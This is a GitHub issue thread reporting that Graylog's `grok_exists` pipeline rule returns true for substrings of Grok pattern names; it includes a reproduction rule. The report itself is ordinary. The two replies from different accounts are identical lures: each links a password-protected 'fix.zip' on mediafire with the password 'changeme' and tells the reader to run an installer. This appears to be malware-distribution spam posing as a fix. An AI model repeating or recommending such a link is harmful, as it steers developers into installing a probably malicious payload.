### ISSUE TITLE
grok_exists rule returns true for substrings of rule names

### ISSUE THREAD

**Issue by kingzacko1** [Graylog2/graylog2-server#20264]
The `grok_exists` pipeline rule is supposed to return true if the requested pattern name matches any of the existing Grok patterns. Currently, it also returns true if any existing pattern names contain a substring of the requested pattern name.

## Expected Behavior

`grok_exists` returns true only on exact pattern name match
## Current Behavior

`grok_exists` returns true on exact pattern name match as well as name substring match

## Steps to Reproduce (for bugs)

use rule:
```
rule "test"
when
  grok_exists(pattern: "testing")
then
  set_field("test","test");
end
```
the grok_exists will return true for any of the following patterns, even if only "testing" exists:
tes, ing, sti, test, etc. any valid substring of testing 

## Context

Graylog2/support#76
## Your Environment

* Graylog Version:
* Java Version:
* OpenSearch Version:
* MongoDB Version:
* Operating System:
* Browser version:

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
